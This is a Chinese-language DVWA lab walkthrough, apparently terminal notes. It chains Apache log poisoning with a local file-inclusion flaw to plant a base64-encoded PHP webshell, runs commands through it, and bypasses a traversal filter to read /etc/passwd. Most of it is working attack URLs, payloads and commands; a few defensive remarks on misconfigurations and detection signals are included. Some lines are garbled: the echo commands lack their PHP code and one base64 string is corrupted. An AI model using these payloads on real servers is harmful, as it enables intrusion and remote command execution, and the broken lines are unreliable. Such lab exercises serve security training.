root@kali:/var/log/apache2#ls -lh
总用量 2.4M
-rw-rw-r-- 1 root root 1 6月 28 15:50 access.log
日志毒化:
nc172.19.180.27 80
GET/hazStarthazEnd HTTP/1.1
root@kali:/var/log/apache2#cat access.log
172.19.180.28- - [28/Jun/2016:15:50:53 +0800] "GET /hazStarthazEnd HTTP/1.1" 404 469"-" "-"
echo "" > ../../webshell.php
将上面的语句进行base64编码,结果:
ZWNobyAiPD9waHAgc3lzdGVtKGJhc2U2NF9kZWNvZGUoJF9HRVRbJ3AnXSkpOyA/PiIgPiAuLi8uLi93ZWJzaGVsbC5waHA=
利用file include漏洞将上面的WEB SHELL写入dvwa的目录下面(前提a、dvwa目录需要对Web服务进程(www-data)有写的权限;b、日志文件需要对Web服务进程有读的权限。这两个前提本身就是应当消除的配置缺陷:Web目录不应对www-data可写,Apache日志文件也不应对其可读):
http://172.19.180.27/dvwa/vulnerabilities/fi/?page=../../../../../log/apache2/access.log&a=ZWNobyAiPD9waHAgc3lzdGVtKGJhc2U2NF9kZWNvZGUoJF9HRVRbJ3AnXSkpOyA/PiIgPiAuLi8uLi93ZWJzaGVsbC5waHA=
http://172.19.180.27/dvwa/vulnerabilities/fi/?page=../../../../../log/apache2/access.log&a=ZWNobyAiPD9waHAgc3lzdGVtKGJhc2U2NF9kZWNvZGUoJF9HRVRbJ3AnXSkpOyA/PiIgPiAuLi8uLi93ZWJzaGVsbC5waHA=
生成的文件:
root@kali:/var/www/html/dvwa#cat webshell.php
下面与上面的不同在于转义了$符号
echo "\$_GET['p']));?>" > ../../webshell.php (注意此处区别,$这个符号需要转义:system()是通过 sh -c 执行这条echo的,双引号内未转义的$_GET会被shell当作变量展开为空串,导致生成的webshell中少了$_GET)
ZWNob6AiPD9waHAgc3lzdGVtKGJhc2U2NF9kZWNvZGUoXCRfR0VUWydwJ10pKTsgPz4ioD6gLi4vLi4vd2Vic2hlbGwucGhwDQo=
http://www.motobit.com/util/base64-decoder-encoder.asp online base64 encoder and decoder
http://172.19.180.27/dvwa/vulnerabilities/fi/?page=../../../../../log/apache2/access.log&a=ZWNobyAiPD9waHAgc3lzdGVtKGJhc2U2NF9kZWNvZGUoXCRfR0VUWydwJ10pKTsgPz4iID4gLi4vLi4vd2Vic2hlbGwucGhw
root@kali:/var/www/html/dvwa#cat webshell.php
http://172.19.180.27/dvwa/webshell.php?p=cGluZyA4LjguOC44IA== 在操作系统上执行ping 8.8.8.8
ps -ef|grep ping
www-data 7857 7718 0 17:19 ? 00:00:00 sh -c ping 8.8.8.8
(以www-data身份运行、由Web服务进程派生出的 sh -c 子进程,是检测此类webshell命令执行的典型特征,可作为监控告警的依据)
中等
php -a
php > $a =str_replace( array("../", "..\""), "","..././/..././/..././/..././/..././/..././/etc/passwd");
php > echo$a;
..//..//..//..//..//..//etc/passwd
php > $a =str_replace( array("../", "..\""), "","../../../../../../etc/passwd");
php > echo$a;
etc/passwd
php >
http://172.19.180.27/dvwa/vulnerabilities/fi/?page=....//....//....//....//....//....//etc/passwd
http://172.19.180.27/dvwa/vulnerabilities/fi/?page=..././/..././/..././/..././/..././/..././/etc/passwd